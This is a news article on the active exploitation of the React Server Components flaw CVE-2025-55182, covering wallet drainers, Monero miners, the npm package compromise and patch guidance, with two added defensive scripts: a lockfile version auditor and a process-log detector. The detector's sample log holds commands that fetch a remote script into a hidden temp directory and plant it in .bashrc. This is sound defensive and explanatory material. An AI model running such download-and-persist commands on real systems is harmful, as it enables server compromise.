A critical remote code execution bug in React Server Components is being weaponized, adding server hijacking, cryptocurrency wallet draining, and Monero miner installs to a year in which $3 billion has already been stolen, despite calls for emergency patching.
Summary
- The Security Alliance and Google TIG say attackers are exploiting CVE-2025-55182 in React Server Components to execute arbitrary code, steal authorization signatures, and compromise crypto wallets.
- While Vercel, Meta, and framework teams rushed out patches and WAF rules, researchers discovered two new RSC bugs and warned that JavaScript supply chain risks like the Josh Goldberg npm hack still exist.
- Global Ledger reports that over $3 billion was stolen in 119 hacks in the first half of 2025, with funds laundered within minutes through bridges and privacy coins such as Monero, and only 4.2% recovered.
A critical security vulnerability in React Server Components has triggered an urgent warning across the crypto industry, as threat actors are exploiting the flaw to compromise wallets and deploy malware, according to the Security Alliance.
The Security Alliance says crypto drainers are actively weaponizing CVE-2025-55182 and urges all websites to immediately check their front-end code for suspicious assets. The vulnerability affects all websites that use React, not just Web3 protocols, and attackers are targeting approval signatures across platforms.
Security researchers say users face risks when signing transactions because malicious code intercepts wallet communications and redirects funds to addresses controlled by attackers.
The React team published CVE-2025-55182 on December 3 with a CVSS score of 10.0, following a November 29 report by Lachlan Davidson through the Meta Bug Bounty program. According to the disclosure, the unauthenticated remote code execution vulnerability stems from the way React decodes payloads sent to server function endpoints, which lets an attacker craft malicious HTTP requests that execute arbitrary code on the server.
React releases patched versions
The flaw affects the react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack packages in React versions 19.0, 19.1.0, 19.1.1, and 19.2.0. According to the advisory, major frameworks built on them, including Next.js, React Router, Waku, and Expo, require immediate updates.
According to the release notes, the fixes ship in versions 19.0.1, 19.1.2, and 19.2.1, and Next.js users need to upgrade across multiple release lines, from 14.2.35 to 16.0.10.
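One way to check an application's lockfile against the affected packages and versions listed above, as an added example (not code from the article, the React project, or Vercel); the lockfile fragment is constructed and the only version data used is the vulnerable/patched list the advisory gives for the 19.x lines:

```javascript
// Added example: audit a package-lock.json (lockfile v2/v3 "packages" map)
// for the React Server Components packages named in the CVE-2025-55182 advisory.
const AFFECTED_PACKAGES = new Set([
  "react-server-dom-webpack",
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
]);
// First patched release of each affected 19.x line: 19.0.1, 19.1.2, 19.2.1.
const FIXED_PATCH = { "19.0": 1, "19.1": 2, "19.2": 1 };

function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(v);
  return m ? { major: +m[1], minor: +m[2], patch: +m[3] } : null;
}

// Classify one installed version: "vulnerable", "patched", or "outside-range"
// (a 19.x line the advisory does not mention, or a different major).
function classify(version) {
  const p = parseVersion(version);
  if (!p) return "unparseable";
  const line = `${p.major}.${p.minor}`;
  if (!(line in FIXED_PATCH)) return "outside-range";
  return p.patch < FIXED_PATCH[line] ? "vulnerable" : "patched";
}

function auditLockfile(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    // Nested installs look like node_modules/a/node_modules/<name>; the last
    // segment is the package name, so duplicated copies are not missed.
    const name = path.split("node_modules/").pop();
    if (!AFFECTED_PACKAGES.has(name) || !entry.version) continue;
    const status = classify(entry.version);
    const line = entry.version.split(".").slice(0, 2).join(".");
    findings.push({
      name, path, version: entry.version, status,
      upgradeTo: status === "vulnerable" ? `${line}.${FIXED_PATCH[line]}` : null,
    });
  }
  return findings;
}

// Constructed sample lockfile: one vulnerable top-level copy, one patched nested copy.
const SAMPLE_LOCK = {
  packages: {
    "node_modules/react-server-dom-webpack": { version: "19.2.0" },
    "node_modules/some-lib/node_modules/react-server-dom-turbopack": { version: "19.1.2" },
    "node_modules/react": { version: "19.2.0" },
  },
};

console.log(JSON.stringify(auditLockfile(SAMPLE_LOCK), null, 2));
```

Run it against a real lockfile with `auditLockfile(JSON.parse(fs.readFileSync("package-lock.json", "utf8")))`; anything reported as "vulnerable" needs the listed upgrade, and nested copies count too.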
Researchers also reported two new vulnerabilities in React Server Components, discovered while attempting to bypass the patch. These are distinct issues, separate from the original CVE, and the researchers say the React2Shell patch remains effective against the remote code execution exploit.
Although Vercel introduced web application firewall rules that automatically protect projects on its platform, the company stressed that WAF protection alone is not enough. In a December 3 security bulletin, Vercel said users should upgrade to a patched version immediately, adding that the vulnerability affects applications that process untrusted input in a way that allows remote code execution.
The Google Threat Intelligence Group documented a wide range of attacks beginning December 3, tracking groups ranging from opportunistic hackers to government-backed operations. According to the report, a Chinese hacker group mainly targeted cloud servers on Amazon Web Services and Alibaba Cloud and installed various types of malware on the compromised systems.
According to the Google Threat Intelligence Group, these attackers used techniques to maintain long-term access to victims’ systems. Some groups installed software that created remote access tunnels, while others introduced programs that continually downloaded additional malicious tools disguised as legitimate files. According to researchers, the malware hides in system folders and automatically restarts to avoid detection.
Security researchers said financially motivated criminals took part in a wave of attacks starting on December 5, installing cryptocurrency mining software that used victims’ computing power to generate Monero. These miners run constantly in the background, driving up power costs while benefiting the attackers. According to the researchers, underground hacking forums quickly filled with discussions sharing attack tools and exploitation experiences.
The React vulnerability comes on the heels of a September 8 attack in which hackers compromised Josh Goldberg’s npm account and published malicious updates to 18 widely used packages, including chalk, debug, and strip-ansi. Together, these utilities account for more than 2.6 billion weekly downloads, and researchers found crypto-clipper malware in the updates that hooks browser functions and swaps legitimate wallet addresses for attacker-controlled ones.
Ledger CTO Charles Guillemet described the incident as a “massive supply chain attack” and advised users without hardware wallets to avoid on-chain transactions. According to Guillemet, the attacker gained access through a phishing campaign posing as npm support, claiming that unless two-factor authentication credentials were updated by September 10, the account would be locked.
Hackers are stealing cryptocurrencies and moving them faster, with one laundering process reportedly taking just 2 minutes and 57 seconds, according to industry data.
According to data from Global Ledger, hackers stole more than $3 billion in 119 incidents in the first half of 2025, and in 70% of breaches the funds were moved before the incident was made public. According to the report, only 4.2% of stolen assets are recovered because laundering now takes seconds instead of hours.
According to the security advisory, organizations using React or Next.js are encouraged to upgrade immediately to versions 19.0.1, 19.1.2, or 19.2.1, deploy WAF rules, audit all dependencies, monitor for wget or cURL commands initiated by web server processes, and check for unauthorized hidden directories and malicious shell configuration injections.
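The monitoring guidance above, turned into detection logic over process-execution events, as an added example (not code from the article, Google TIG, or any real EDR tool); the `key=value` event format and the log lines are constructed, and the list of web server process names is an assumption:

```javascript
// Added example: flag the post-exploitation indicators the advisory lists in
// process-exec events: curl/wget spawned by a web server process, hidden
// directories under temp paths, and edits to shell startup files.
const WEB_SERVER_PROCS = new Set(["node", "next-server", "next", "npm", "bun"]); // assumed names
const DOWNLOADERS = new Set(["curl", "wget"]);
const SHELL_RC = /(^|\/)\.(bashrc|bash_profile|profile|zshrc)\b/;
// Hidden directory directly under a world-writable temp path (e.g. /tmp/.x/).
const HIDDEN_TMP = /\/(tmp|var\/tmp|dev\/shm)\/\.[^/\s"']+/;

// Parse `key=value` pairs; quoted values may contain spaces.
function parseEvent(line) {
  const ev = {};
  for (const m of line.matchAll(/(\w+)=("([^"]*)"|\S+)/g)) ev[m[1]] = m[3] ?? m[2];
  return ev;
}

// Return the list of reasons an event is suspicious (empty when benign).
function analyzeEvent(ev) {
  const reasons = [];
  const args = ev.args || "";
  const fromWebServer = WEB_SERVER_PROCS.has(ev.pcomm); // pcomm = parent process name
  if (!fromWebServer) return reasons;
  if (DOWNLOADERS.has(ev.comm)) reasons.push("downloader spawned by web server process");
  if (HIDDEN_TMP.test(args)) reasons.push("hidden directory under a temp path");
  if (SHELL_RC.test(args)) reasons.push("shell startup file touched");
  return reasons;
}

function scanLog(text) {
  const findings = [];
  for (const line of text.split("\n")) {
    if (!line.trim()) continue;
    const ev = parseEvent(line);
    const reasons = analyzeEvent(ev);
    if (reasons.length) findings.push({ ts: ev.ts, pid: ev.pid, comm: ev.comm, reasons });
  }
  return findings;
}

// Constructed sample events: two malicious (lines 1-2), two benign (cron job; app's own .next dir).
const SAMPLE_LOG = `
ts=2025-12-05T10:02:11Z host=web1 pid=4312 ppid=4100 pcomm=node comm=curl args="curl -s http://198.51.100.7/x.sh -o /tmp/.cache-x/x.sh"
ts=2025-12-05T10:02:12Z host=web1 pid=4313 ppid=4100 pcomm=node comm=sh args="sh -c 'echo nohup /tmp/.cache-x/x.sh >> /root/.bashrc'"
ts=2025-12-05T10:03:40Z host=web1 pid=4320 ppid=1 pcomm=cron comm=curl args="curl -s https://updates.example/health"
ts=2025-12-05T10:04:02Z host=web1 pid=4321 ppid=4100 pcomm=node comm=node args="node /srv/app/.next/server.js"
`;

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

The parent-process condition is what keeps the rule useful: curl from cron or a deploy script is routine, while curl or a shell-rc write from the Node process serving the app is not.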